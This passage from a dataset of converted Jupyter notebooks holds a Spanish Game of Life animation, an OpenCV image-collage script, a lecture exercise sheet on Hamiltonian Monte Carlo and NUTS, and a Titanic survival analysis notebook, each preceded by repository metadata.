        (1, 1), (1, 0), (1, -1), (0, -1),
        (-1, -1), (-1, 0), (-1, 1), (0, 1),
    )
    acumulado = np.zeros_like(b)
    for d0, d1 in desplazamientos:
        # Shift the board by (d0, d1) with wraparound and accumulate.
        acumulado = acumulado + np.roll(np.roll(b, d1, 1), d0, 0)
    return acumulado
def paso(b):
    """One step of Conway's Game of Life.

    A cell is alive next generation iff it has exactly 3 live neighbors,
    or it is alive now and has exactly 2. Vectorized replacement for the
    original cell-by-cell Python double loop.
    """
    v = vecindario(b)
    nace = (v == 3)                    # birth (or survival with 3 neighbors)
    sobrevive = (v == 2) & (b != 0)    # survival with 2 neighbors
    return (nace | sobrevive).astype(b.dtype)
# Parámetros del problema
GENERACIONES = 50
N = 17 # Dimensiones del tablero (N, M)
M = 12
pause = False # Pausa
def onClick(event):
    """Mouse-click handler: flip the global pause flag."""
    global pause
    pause = not pause
# Construimos el tablero
tablero = np.zeros((N, M), dtype = int)
# CONDICIONES INICIALES (CASILLAS ENCENDIDAS)
# Añadimos una nave
tablero=np.array(
[[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]])
def randomize(event):
    """Fill the board with random 0/1 cells and redraw the figure.

    Iterates over the board's actual shape: the original `range(0, N-1)`
    both skipped the last row/column and could exceed the 16x16 board
    when N is larger, raising IndexError.
    """
    global b
    filas, columnas = tablero.shape
    for i in range(filas):
        for j in range(columnas):
            tablero[i, j] = random.randint(0, 1)
    b = tablero
    imagen.set_data(b)
    print(tablero)
# Creamos la figura, formateo diverso
fig = plt.figure(figsize=(4, 4))
ax = fig.add_subplot(111)
# ax.axis('off')
b = tablero
imagen = ax.imshow(b, interpolation="none", aspect = "equal", cmap=cm.gray_r)
# Major ticks
# ax.set_xticks(np.arange(0, N, 1));
ax.set_yticks(np.arange(0, N, 1));
# Labels for major ticks
# ax.set_xticklabels(np.arange(1, N+1, 1));
ax.set_yticklabels(np.arange(1, N+1, 1));
# Minor ticks
# ax.set_xticks(np.arange(-.5, N, 1), minor=True);
# ax.set_yticks(np.arange(-.5, N, 1), minor=True);
plt.tick_params(
axis='x', # changes apply to the x-axis
which='both', # both major and minor ticks are affected
bottom=False, # ticks along the bottom edge are off
top=False, # ticks along the top edge are off
labelbottom=False) # labels along the bottom edge are off
def animate(i):
    """FuncAnimation callback: advance the board one generation per frame."""
    global b
    if not pause: # Pause check
        print(i) # frame index (FuncAnimation keeps advancing it regardless)
        b = paso(b) # step the Game of Life once
        imagen.set_data(b)
    return imagen,
# Animacion
anim = animation.FuncAnimation(fig, animate, frames=GENERACIONES, blit=True, interval = 800, repeat = True)
plt.show()
# -
# En el ejemplo anterior se muestra la animación del ángulo de 45 grados con 49 células vivas; en la última etapa las iteraciones se vuelven repetitivas e infinitas.
#
#
# **Conclusión**
#
# Según los análisis anteriores podemos decir que a pesar de que las figuras representadas tenian diferente tamaño en grados pero casi el mismo número de celulas muertas , el resultado de celulas muertas fue el mismo pero en diferente área de plano cartesiano.
# En el segundo caso se comparó los dos ángulos de 45° pero con diferentes número de celulas vivas en donde con menor número de celulas se obtuvo un resultado de transacíones repetitivas.
#
| 14,267 |
/module2-intermediate-linear-algebra/Gabe_Flomo_Intermediate_Linear_Algebra_Assignment.ipynb
|
4c4598c4b8015f3624102a7f531478aee363ddaa
|
[] |
no_license
|
Gabe-flomo/DS-Unit-1-Sprint-4-Linear-Algebra
|
https://github.com/Gabe-flomo/DS-Unit-1-Sprint-4-Linear-Algebra
| 1 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 63,344 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
#import library
import cv2
import numpy as np
# Load the two portrait images from the working directory.
# NOTE(review): cv2.imread returns None on a missing file — verify both
# "viratk.jpg" and "mahi1.jpg" exist before running.
virat=cv2.imread("viratk.jpg")
mahi=cv2.imread("mahi1.jpg")
# Show both originals; wait for a key press, then close the windows.
cv2.imshow("Virat",virat)
cv2.imshow("Mahi",mahi)
cv2.waitKey()
cv2.destroyAllWindows()
# Bare expressions: in a notebook these display the (h, w, channels) shapes.
virat.shape
mahi.shape
# Crop to rows 10:500, columns 30:600 so both images match for the collage.
mahi=mahi[10:500, 30:600]
cv2.imshow("Mahi",mahi)
cv2.waitKey()
cv2.destroyAllWindows()
virat=virat[10:500, 30:600]
cv2.imshow("Virat",virat)
cv2.waitKey()
cv2.destroyAllWindows()
#Collage
# Place the two equally-sized crops side by side.
combine = np.hstack((mahi, virat ))
cv2.imshow("Combine images", combine)
cv2.waitKey()
cv2.destroyAllWindows()
| 792 |
/cs/Lecture 12 computer tasks and solutions-20171017/Lecture 12 notes and exercises.ipynb
|
0bb4c971af260095294596e0b87fdd198986c45d
|
[] |
no_license
|
mdmohsinalikhan/others
|
https://github.com/mdmohsinalikhan/others
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 8,787 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] deletable=true editable=true
# University of Helsinki, Department of Mathematics and Statistics
# MAST32001 Computational Statistics I, Autumn 2017
# Antti Honkela
#
# # Lecture 12: MCMC and gradients 2: HMC tuning with NUTS and HMC for posterior inference
#
# In this lecture we will consider two topics: automatic tuning using the no-U-turn-sampler (NUTS) and applying HMC for sampling from the posterior distribution of a Bayesian model.
#
# ## HMC tuning with NUTS
#
# As shown by the problems of Lecture 11, tuning the stepsize $\epsilon$ and number of leapfrog steps $L$ in HMC can be nontrivial.
#
# The No-U-Turn Sampler (NUTS) of Hoffman and Gelman provides a neat way of avoiding this issue. Intuitively, NUTS works by iteratively extending the path until it observes a U-turn of the path turning back on itself. In order to guarantee detailed balance, the path is extended both forward and backward in virtual time. Furthermore instead of a single accept/reject choice, the algorithm samples the next point among the set of candidates generated along the path. The algorithm also includes a heuristic for tuning $\epsilon$.
#
# Most modern Bayesian inference software packages use NUTS as the default MCMC algorithm for cases where it is applicable (models with continuous variables).
#
# ## Further reading:
#
# Hoffman & Gelman: The No-U-Turn Sampler: Adaptively Setting Path Lengths in Hamiltonian Monte Carlo. JMLR 15:1593-1623 (2014).
# http://www.jmlr.org/papers/volume15/hoffman14a/hoffman14a.pdf
#
# Radford M. Neal: MCMC using Hamiltonian Dynamics
# https://arxiv.org/pdf/1206.1901.pdf
# (A classical and very comprehensive HMC tutorial)
#
# Michael Betancourt: A Conceptual Introduction to Hamiltonian Monte Carlo
# https://arxiv.org/pdf/1701.02434.pdf
# (A more modern HMC tutorial)
#
# -
# ## 0. HMC with fixed code
#
# Rerun the examples from Lecture 11 using the fixed HMC sampler. (I am very sorry about the mistake in the original code!)
#
# ## 1. NUTS
#
# Redo the examples from Lecture 11 using the No-U-Turn Sampler of Hoffman & Gelman. How many samples do you need to get a good representation of the target density?
#
# If you are familiar with Python, it is a good exercise to re-implement the NUTS algorithm (Algorithm 6 in Hoffman & Gelman). If you do not feel up to the task, you can try the example implementation available at
# http://www.helsinki.fi/~ahonkela/teaching/compstats1/nuts.py
#
# Hint: to use the example code, save the file to the same directory as this notebook, run
# ``` {python}
# import nuts
# nuts.nuts6(...)
# ```
# You can use `? nuts.nuts6` to get help.
# + [markdown] deletable=true editable=true
# ## 2. HMC sampling for posterior inference in linear regression
#
# Let us revisit Problem 4 from Lecture 4 where we studied linear regression using maximum likelihood estimation.
# We will use data from the Framingham Heart Study that studies the association between heart disease and its causes.
#
# A description of the data and its fields can be found at http://www.maths.utas.edu.au/DHStat/Data/Flow.html
#
# 1. Load the data using the below code. Standardise the data by subtracting the mean and dividing each variable by two standard deviations (see http://www.stat.columbia.edu/~gelman/research/published/standardizing7.pdf). Fit all the models using the standardised data as this makes sampling a lot easier.
# 2. Using the same normal log-likelihood as Problem 4.2 from Lecture 4 and priors
# $$ p(\alpha) = \mathcal{N}(\alpha;\; 0, 2^2) \\
# p(\beta) = \mathcal{N}(\beta;\; 0, 2^2), $$
# use HMC / NUTS to draw samples from the posterior distribution. How does the posterior compare to the maximum likelihood estimates obtained at Lecture 4?
# 3. Change the likelihood to use the Laplace distribution for the residuals $\epsilon_i$ while keeping the same priors. Repeat the previous task.
# +
import pandas as pd
import autograd.numpy as np
import autograd
from scipy.optimize import minimize
# load the data from CSV file using pandas
fram = pd.read_csv('http://www.helsinki.fi/~ahonkela/teaching/compstats1/fram.txt', sep='\t')
# convert the variables of interest to numpy arrays for autograd compatibility
# input: Framingham relative weight - the ratio of the subjects weight to the median weight for their sex-height group
x = np.array(fram['FRW'])
# target: Systolic blood pressure, examination 1
y = np.array(fram['SBP'])
def standardize(x):
    """Standardise *x*: subtract the mean and divide by two standard deviations.

    Follows Gelman (2008), "Scaling regression inputs by dividing by two
    standard deviations", as prescribed in the exercise text above, so that
    standardised continuous predictors are on a scale comparable to binary
    predictors.

    Parameters
    ----------
    x : array-like of numbers

    Returns
    -------
    numpy array of the same length with mean 0 and standard deviation 0.5.
    """
    x = np.asarray(x, dtype=float)
    # Population std (ddof=0); the factor of 2 is the Gelman convention.
    return (x - x.mean()) / (2.0 * x.std())
xs = standardize(x)
ys = standardize(y)
# -
# ## 3. HMC sampling for posterior inference 2
#
# Apply HMC / NUTS sampling to perform Bayesian inference over the mean $\mu$ and the standard deviation $\sigma$ in a normal model
# $$ p(x_i | \mu, \sigma^2) = \mathcal{N}(x_i;\; \mu, \sigma^2) $$
# for a data set $X = (x_i)_{i=1}^n$ loaded below.
#
# We will use the same conjugate priors as in Exercise 5 for Week 4:
# $$ p(\mu) = \mathcal{N}(\mu;\; \mu_0, \sigma_0^2) \\ p(\sigma^2) = \mathrm{InvGamma}(\alpha, \beta), $$
# where $\mathrm{InvGamma}(\alpha, \beta)$ denotes the inverse-gamma distribution. For standardised data, we can use the hyperparameters $\mu_0 = 0, \sigma_0^2 = 10^2, \alpha = \beta = 2$.
#
# Hints:
# * In order to apply HMC / NUTS you need to transform $\sigma^2$ to an unbounded space with $\log$-transformation as before.
# * In order to play safe with autograd, you may want to implement the required probability densities yourself rather than using scipy.
# * NUTS can sometimes drive some of the parameters to quite extreme values. You should make sure that your target function evaluation is numerically stable, i.e. make sure you will not evaluate exp() for too large numbers etc.
# +
# %matplotlib inline
import autograd.numpy as np
import autograd.numpy.random as npr
import pandas as pd
import autograd.scipy.special as scs
import matplotlib.pyplot as plt
# Load the toy data set: tab-separated, no header row.
data = pd.read_csv('http://www.helsinki.fi/~ahonkela/teaching/compstats1/toydata2.txt', sep='\t', header=None)
# Flatten the DataFrame to a plain 1-D numpy array of its first column.
data = data.values
data = np.array(data[:,0])
| 6,402 |
/Notebooks/py/rounak15/titanic-survival-prediction-with-python/titanic-survival-prediction-with-python.ipynb
|
2ecda5cbed2149ea6f46bc11e1658829f7c7179c
|
[] |
no_license
|
nischalshrestha/automatic_wat_discovery
|
https://github.com/nischalshrestha/automatic_wat_discovery
| 2 | 1 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 29,461 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] _uuid="da3173fee2fb9aad4bc433d025f790dacfcb72f2"
# **Titanic Survival Predictions**
#
# I am new to data science and machine learning and this is my first attempt at Kaggle where I will be trying to predict the possibility of a passenger surviving on the Titanic using the *Titanic: Machine Learning from Disaster dataset*
#
# We will tackle this problem with the following steps
# 1. Importing the packages and libraries.
# 2. Reading and Exploring the Data.
# 3. Data Analysis.
# 4. Visual Data Analysis.
# 5. Cleaning the Data
# 6. Feature Engineering
# 7. Machine learning
# 8. Submitting our predictions
#
# I would love to see your feedback in the comments section!
# + [markdown] _uuid="54cbe4e8340bc21d0f95490dd107c6f41ca23142"
# **1) Importing the packages and libraries**
#
# let's start off by importing the necessary libraries for data analysis and visualisation
# + _cell_guid="79c7e3d0-c299-4dcb-8224-4455121ee9b0" _uuid="d629ff2d2480ee46fbb7e2d37f6b5fab8052498a"
#lets load the required packages and libraries for data analysis
import numpy as np
import pandas as pd
import re
import warnings
warnings.filterwarnings('ignore')
#For data visualization
import seaborn as sns
import matplotlib.pyplot as plt
# %matplotlib inline
# + [markdown] _uuid="8ed4b6d08e94b2177f2a67d979553e2e4606265f"
# **2) Reading and exploring the data**
#
# let's read the training and testing datasets from the provided CSV files and use the ***.head()*** and ***.info()*** methods to take a glimpse at our data
# + _uuid="cdf53ad9e2624113f2dd673753ff6297167ba9c4"
# Import the Kaggle Titanic training and test splits; test.csv has no
# Survived column (that is what we must predict).
train_df = pd.read_csv('../input/train.csv')
test_df = pd.read_csv('../input/test.csv')
# + _uuid="1acdc6cb9f6a23616c3009a3115aa3b4fc5a6eed"
#lets take a look at our training data
train_df.head()
# + _uuid="e6e415fddaeb1c501aeab5b16162101b102a8d4f"
# Now the test dataset
test_df.head()
# + [markdown] _uuid="c7af16a1f99e22a807f2d7b34171e35e9c57a09a"
# The Survived column is missing here because that is what we are supposed to predict with our model.
# + _uuid="cf3bf44516383a939e446b4098e5c46359653f1b"
# lets see what kind of data we have to work with
train_df.info()
# + [markdown] _uuid="fef1e37e8f9631f351f5101e9390d7babd445ce0"
# From above, we can see that we have 891 rows or samples and 12 columns of types *int64*, *object* and *float64* to work with.
# + [markdown] _uuid="7fc9c5656857fc796ef20452e1c56f4f23abb2e9"
# **3) Data analysis :**
#
# Now let's see what features we have to train our model on and what useful insights we can obtain from them.
#
# + _uuid="adc7cc2fa38e4f38f4663f87e96c9f45b4b21aa6"
#printing out a list of all the columns in our training dataset
train_df.columns
# + [markdown] _uuid="bcd6efc56fec1b8b8ccb0d75f7608eea8fe9c839"
# ** Types of features : **
#
# * Categorical : Pclass, Sex, Embarked, Survived
# * Continuous : Age, Fare, Sibsp, Parch, PassengerId
# * Alphanumeric: Ticket, Cabin, Name
# + [markdown] _uuid="5c2cf46ed184e084f5a15e6af4d14428c2f2d219"
#
# + [markdown] _uuid="f8a2539bf26ee76950d06ceeaafb2298d156fc7b"
# Now that we know what kind of features we are going to work with, let's take a look what information they provide us:
# + _uuid="90e1c50f7bf034cf26a90bc3fae147dfe78c7d81"
#printing summary statistics
train_df.describe()
# + [markdown] _uuid="6085e6151b756b6d9f424c5e0d43a147f0107722"
# ** Observations from above summary statistics: **
# * There are a total of 891 passengers in our training dataset.
# * Since the Survived column has dicrete data, the mean gives us the number of people survived from 891 i.e. 38%.
# * Most people belonged to Pclass = 3
# * The maximum Fare paid for a ticket was 512 however the fare prices varied a lot as we can see from the standard deviation of 49
# + _uuid="d0927c2f9cdf316865c9ea8ce5f28727788dace4"
train_df.describe(include='O')
# + [markdown] _uuid="66ed8953b49ceeb40f0be66a1e433ea12cdcc4cd"
# Taking a look at our categorical features we find that:
# * The passneger column has two sexes with male being the most common.
# * Cabin feature has many duplicate values.
# * Embarked has three possible values with most passengers embarking from Southhampton.
# * Names of all passengers are unique.
# * Ticket column also has a fair amount of duplicate values.
#
# + _uuid="b4c8c281824d05296f260f82ee29ee85c2a1243b"
#Finding the percantage of missing values in train dataset
train_df.isnull().sum()/ len(train_df) *100
# + _uuid="f585235336b82b08c8e87d78ee3607d9e7818e7d"
#Finding the percentage of Null values in test dataset
test_df.isnull().sum()/ len(test_df) *100
# + [markdown] _uuid="aaad212cbeccd6805890e296125cbf9b166432a6"
# As we can see the Age column and Embarked column are missing values that we will need to fill.
# The Cabin column has 77% and 78% missing values in the train and test datasets respectively; hence, it might be worth considering dropping that feature.
# + [markdown] _uuid="42d1056ca02efdb0330a9cb51e3ad8c9401e9ff3"
# ** 4) Visual Data Analysis**
#
# It's time to visualize our data and try to draw some inferences from it
# + [markdown] _uuid="087e6f019ec62b6fb3cd3086e97b4b614bc92084"
# ** Sex feature**
#
# let's begin by exploring the Sex column in our trainig data set
# + _uuid="1faf4cf53a3b03056a61b0511958751952e46a42"
sns.countplot('Sex',data=train_df)
train_df['Sex'].value_counts()
# + [markdown] _uuid="45fea51e2b6f2abb4d458d9b5989f975139b009e"
# The number of males on board were clearly more than the female. Now let's see how their survival percentages were:
# + _uuid="95f40aefaa6b3b35cea9cbd7e1f2a6a20a72ed40"
#Comparing the Sex feature against Survived
sns.barplot(x='Sex',y='Survived',data=train_df)
train_df.groupby('Sex',as_index=False).Survived.mean()
# + [markdown] _uuid="6c4d23983a418fbcd57dae3663bacddf378ba7ac"
# As one would assume the number of female who survived was much more than the males who survived i.e. 74% females as against to 18% males
# + [markdown] _uuid="99ad9863e0192d39e6b25df8793db533acdbb36c"
# How did the Class of each passenger affect their survival?
# + _uuid="ce060b776c9ec19cb3cdc70fb8941d420e271fad"
#Comparing the Pclass feature against Survived
sns.barplot(x='Pclass',y='Survived',data=train_df)
train_df[["Pclass", "Survived"]].groupby(['Pclass'], as_index=False).mean().sort_values(by='Survived', ascending=False)
# + [markdown] _uuid="e5c570ef01a65cc54327d3bdead82025c9d6c799"
# Clearly Class had an effect on survival of each passenger with the percentages of survival being 62.96%, 47.28%, 24.23% for Pclass 1, 2 and 3 respectively.
# Thus, belonging to Pclass = 1 had a huge advantage.
# + [markdown] _uuid="e1c18b20aac0cbf4b5b84d8f3ad24ea471b024ef"
# Did the port from which the passengers embarked have an effect on their Survival?
# + _uuid="35f3753d11d58c24aa4d6cd6e68bfd22eb1b5ee6"
#Comparing the Embarked feature against Survived
sns.barplot(x='Embarked',y='Survived',data=train_df)
train_df[["Embarked", "Survived"]].groupby(['Embarked'], as_index=False).mean().sort_values(by='Survived', ascending=False)
# + [markdown] _uuid="ba40ed2c06a15ef5a1b00d3349aa770984ae9d10"
# It seems that the passengers that embarked from port Cherbourg had a higher rate of Survival at 55%. This could be either due to their Sex or socio-economic class.
# Let's move forward to see the effect of having parents or children on-board.
# + _uuid="a6c2ca8ff240f890db44c5e087bff4a3ebb8c330"
sns.barplot(x='Parch',y='Survived',data=train_df)
train_df[["Parch", "Survived"]].groupby(['Parch'], as_index=False).mean().sort_values(by='Survived', ascending=False)
# + [markdown] _uuid="de27505dc010bfc15b70d12b9a26ab47fee17f44"
# Looks like passengers who had either 1, 2 or 3 had a higher possibility of surviving than the ones had none. However having more than 3 made the possibility even lesser.
# Moving on to the effect of having spouse or siblings on Survival:
# + _uuid="16a3b4f8a607be8282e268e461bd5c9463c41614"
sns.barplot(x='SibSp',y='Survived',data=train_df)
train_df[["SibSp", "Survived"]].groupby(['SibSp'], as_index=False).mean().sort_values(by='Survived', ascending=False)
# + [markdown] _uuid="2a22ca09e29c90a13292a7d533bed22edf5e859a"
# It seems that having a spouse or 1 sibling had a positive effect on Survival as compared to being alone. Though the chances of survival go down with the number of siblings after 1.
# + [markdown] _uuid="93adc95dd7a17918a5cb7fc0b93ea74af90df89a"
# The Age column has some missing values. We will take care of that later when we clean our training data.
# First we shall proceed by:
# 1. Plotting a histogram of the age values .
# 2. Taking a look at the median value of age as well as the spread.
# + _uuid="c416c66beb6b8e5e5e9f587a176e6ff2ac3f6edf"
train_df.Age.hist(bins=10,color='teal')
plt.xlabel('Age')
plt.ylabel('Count')
plt.show()
print("The Median age of passengers is :", int(train_df.Age.median()))
print("The Standard Deviation age of passengers is :", int(train_df.Age.std()))
# + [markdown] _uuid="27604041fa28d21fceeb490b7cc80d6c03ea9ff3"
# It is obvious to assume that younger individuals were more likely to survive, however we should test our assumption before we proceed.
# + _uuid="f6c4b31271a89710d3664e98c9f84f82689ab90d"
sns.lmplot(x='Age',y='Survived',data=train_df,palette='Set1')
# + [markdown] _uuid="f045da56e8a919c4cc0c744f9739b855908e28f9"
# Our assumption was right, younger individuals were more likely to survive.
# + [markdown] _uuid="f8eba080fd5f78944007e0b85def210b8ae62352"
# From the sex column we saw that there was a significant difference in the percentage of men and women that survived.
# Does sex also play a role when it comes to surviving the disaster along with the age?
# + _uuid="576e947ba72210f71781348a564e4ca235993f4e"
sns.lmplot(x='Age',y='Survived',data=train_df,hue='Sex',palette='Set1')
# + [markdown] _uuid="10948d548a00b5e70b26c35f93e10ead918b5171"
# Interestingly, age has an opposite effect on the survival in men and women. The chances of survival increase as the age of women increases.
#
# Takeaway: Age feature can have a different effect on the outcome depending on the sex of the passenger. Perhaps we can use this information in feature engineering
# + _uuid="2dab99a02f74d4a3ff470f64f704f85aecafcd40"
#Checking for outliers in Age data
sns.boxplot(x='Sex',y='Age',data=train_df)
#getting the median age according to Sex
train_df.groupby('Sex',as_index=False)['Age'].median()
# + _uuid="8a51ac77d187c95488572eb8bbac63a9f87f72ba"
#plotting the Fare column to see the spread of data
sns.boxplot("Fare",data=train_df)
#Checking the mean and median values
print("Mean value of Fare is :",train_df.Fare.mean())
print("Median value of Fare is :",train_df.Fare.median())
# + [markdown] _uuid="ff7fce6bc46360a5ac005d7959b5b4060b44988e"
# **5) Cleaning Data**
#
# Now that we have visualized our data , we can proceed to fill in the NaN values in our test and train datasets and drop the columns that we will not require
# + _uuid="2bb0295ff0388c959e9d8acabf334dcc934ee9e6"
# Drop the columns we will not use for modelling; keep the test-set
# PassengerId aside first, since the submission file needs it later.
cols_to_drop = ['Cabin', 'Ticket', 'PassengerId']
test_passenger_df = pd.DataFrame(test_df.PassengerId)
train_df = train_df.drop(columns=cols_to_drop)
test_df = test_df.drop(columns=cols_to_drop)
test_passenger_df.head()
# + [markdown] _uuid="a0e7b9ec7a4d828b4aec79be79a7acc039190adc"
# Now, let's fill in the missing values for the Embarked column in the training dataset. Most people embarked on their journey from Southampton port. Hence, we will be filling the two missing values with "S".
# + _uuid="6dc50aac4030b5abe4c44c90643647ec4190bed5"
# Fill the two missing Embarked values in the TRAIN set with 'S'
# (Southampton), the most common port.
# NOTE(review): the original comment mentioned the test set too, but the
# missing-value summary above shows test_df has no missing Embarked values,
# so only train_df is filled here.
train_df.Embarked.fillna('S',inplace=True)
# + [markdown] _uuid="d7ddccf978f3db5a66e821388ffb087b447de7d4"
# We will replace the NaN values in the age column with the median age
# + _uuid="faa342aaaa6d2f11ae263c550452e641d843cf93"
# Fill missing ages with the training-set median age instead of the
# hard-coded literal 28 (which was the train median per the analysis above):
# the same imputed value is used for both splits, and it stays correct if
# the data ever changes.
median_age = train_df.Age.median()
train_df.Age.fillna(median_age, inplace=True)
test_df.Age.fillna(median_age, inplace=True)
# + [markdown] _uuid="19a2176e450a8a62e0c1238e03c07eea83b0e2d2"
# There is a small fraction of fare values missing in the fare column which we will fill using the median value since there a plenty of outliers in the data.
# + _uuid="79990f4df37e08d1e098ef100039d6798d713cdd"
#Filling the null Fare values in test dataset
test_df.Fare.fillna(test_df.Fare.median(), inplace=True)
# + [markdown] _uuid="144574ede336ae474b708052f6562f9d101e9e07"
# **6) Feature Engineering**
# + [markdown] _uuid="dc8946017870f7835f678331853ae0243cccf4d8"
# *Title Feature*
# The name column might not be useful to us directly but a lot of names have titles like Mr, Mrs, Lady, etc which might indicate the individual's status in the society which can affect the chance of survival.
#
# We shall try to extract a *Title* feature from the name column, which might improve the performance of our model.
# + _uuid="a7444c8ba9326f32e1834194a2eb8bfc15b469e3"
#combining train and test dataframes to work with them simultaneously
Combined_data = [train_df, test_df]
# + _uuid="a50bc02596f2835f51c893e6f0998210beaf20a4"
# Extract the honorific title (e.g. "Mr", "Miss") from each Name: the
# first run of letters that is preceded by a space and followed by a dot.
for dataset in Combined_data:
    # BUG FIX: use a raw string for the regex -- '\.' inside a normal
    # string literal is an invalid escape sequence (SyntaxWarning on
    # Python 3.12+); the matched pattern itself is unchanged.
    dataset['Title'] = dataset.Name.str.extract(r' ([A-Za-z]+)\.', expand=False)
# Plot the distribution of the extracted titles.
sns.countplot(y='Title',data=train_df)
# + [markdown] _uuid="c67c5125b779780a2ffaecef151decd0657a93ab"
# There are some titles that are very rare like Capt and Lady. It would be better to group such titles under one name know as 'rare'.
# Some titles also seem to be incorrectly spelled. They also need to be rectified.
# + _uuid="5f6b73547cc98beb4ac124e3917a3e934a4e0d6d"
#Refining the title feature by merging some titles
for dataset in Combined_data:
dataset['Title'] = dataset['Title'].replace(['Lady', 'Countess','Capt', 'Col',\
'Don', 'Dr', 'Major', 'Rev', 'Sir', 'Jonkheer', 'Dona'], 'Special')
dataset['Title'] = dataset['Title'].replace({'Mlle':'Miss','Ms':'Miss','Mme':'Mrs'})
train_df.groupby('Title',as_index=False)['Survived'].mean().sort_values(by='Survived',ascending=False)
# + _uuid="7c88ab6acb9f99174f493273d0a70c512d65c0aa"
#Now lets see the distribution of the title feature
sns.countplot(y='Title',data=train_df)
# + _uuid="fed54564cffc62dc074787018297a1e439cab100"
# Map each title to a small integer code; any title left unmapped (none is
# expected after the merge above) would become NaN and is reset to 0.
title_mapping = {"Mr": 1, "Miss": 2, "Mrs": 3, "Master": 4, "Special": 5}
for dataset in Combined_data:
    dataset['Title'] = dataset.Title.map(title_mapping)
    dataset['Title'] = dataset.Title.fillna(0)
# + [markdown] _uuid="64d1983bade22173e529ff6f4b6d282fbd1f0b4b"
# As we observed from our data visualization being alone on the titanic had a disadvantage when it came to survival:
# Next we will create a feature IsAlone which depends on the number of family members that can be calculated from the Parch and SibSp columns
# + _uuid="7ce6b12d940fe9be965b70feed008c8ac2676dfd"
# Derive a binary IsAlone flag: 1 when the passenger has no relatives
# aboard (SibSp + Parch == 0), else 0.  The relative count is kept in a
# local Series, so no temporary column needs to be added and dropped.
for dataset in Combined_data:
    relatives = dataset['SibSp'] + dataset['Parch']
    dataset["IsAlone"] = np.where(relatives > 0, 0, 1)
train_df.head()
# + [markdown] _uuid="0cfbc0e97e8b67affb60bbe8c9edf01fb3a3c0cb"
# Getting rid of the columns that are not required anymore:
# + _uuid="6f954f15f3d7305a68820511912f53c9f229c9ab"
#dropping the Name,SibSP and Parch columns
for dataset in Combined_data:
dataset.drop(['SibSp','Parch','Name'],axis=1,inplace=True)
# + [markdown] _uuid="e96caee826dbef0b2155462583a1fac2696f6cf2"
# Age had big role to play when it came to survival. Clearly younger people were more likely to survive.
# Hence, it should be worth considering a feature IsMinor for the passengers under the age of 15.
# + _uuid="7b865b112b837b5a3347461a4a78af074c88f5d7"
# IsMinor = 1 for passengers younger than 15 (children), 0 otherwise.
# NOTE(review): missing ages were imputed with the median above, so
# passengers with unknown age are never flagged as minors.
for dataset in Combined_data:
    dataset["IsMinor"] = np.where(dataset["Age"] < 15, 1, 0)
# + [markdown] _uuid="e8ad94332647b489198bec0249e9cce3f3851268"
# Older female passengers also had a higher chance of survival. Let's create a feature named Old_Female that accounts for women older than 50 years on board.
# + _uuid="e93bcc0fab6827b99b13bbcfcf2f079ca494b640"
# Flag women older than 50 as Old_Female (0/1) in both splits.
for frame in (train_df, test_df):
    is_old_female = (frame['Age'] > 50) & (frame['Sex'] == 'female')
    frame['Old_Female'] = is_old_female.astype(int)
# + [markdown] _uuid="6c10680f0d2843b13ea49a4836e3c342d9b012eb"
# Pclass, Sex and Embarked are the categorical features in our data. We can convert these categorical variables into dummy variables using the *get_dummies* method in pandas.
# + _uuid="d08ee65977405cb89d4cde56dd887ee67f0679d6"
#Converting categorical variables into numerical ones
train_df2 = pd.get_dummies(train_df,columns=['Pclass','Sex','Embarked'],drop_first=True)
test_df2 = pd.get_dummies(test_df,columns=['Pclass','Sex','Embarked'],drop_first=True)
train_df2.head()
# + [markdown] _uuid="af9bc6c7e0b145a80e6dfa713677db45a8240979"
# The Age and Fare columns have continuous data, and there might be fluctuations that do not reflect patterns in the data, which might be noise. That's why we'll put people that are within a certain range of age or fare in the same bin. This can be achieved using the *qcut* method in *pandas*.
# + _uuid="e3c1675ab1b6293e5caf3e3f5813727eea8e0832"
# Discretise Age into 4 quantile bins (quartiles), labelled 0..3.
# NOTE(review): qcut is fitted separately on train and test, so the bin
# edges differ between the two splits; for consistent features the
# train-derived edges should be applied to the test set via pd.cut.
train_df2['AgeBands'] = pd.qcut(train_df2.Age,4,labels=False)
test_df2['AgeBands'] = pd.qcut(test_df2.Age,4,labels=False)
# + _uuid="af68cdedb7e7b1959d88fac999536b42aa8be1d7"
# Discretise Fare into 7 quantile bins (same train/test caveat as above).
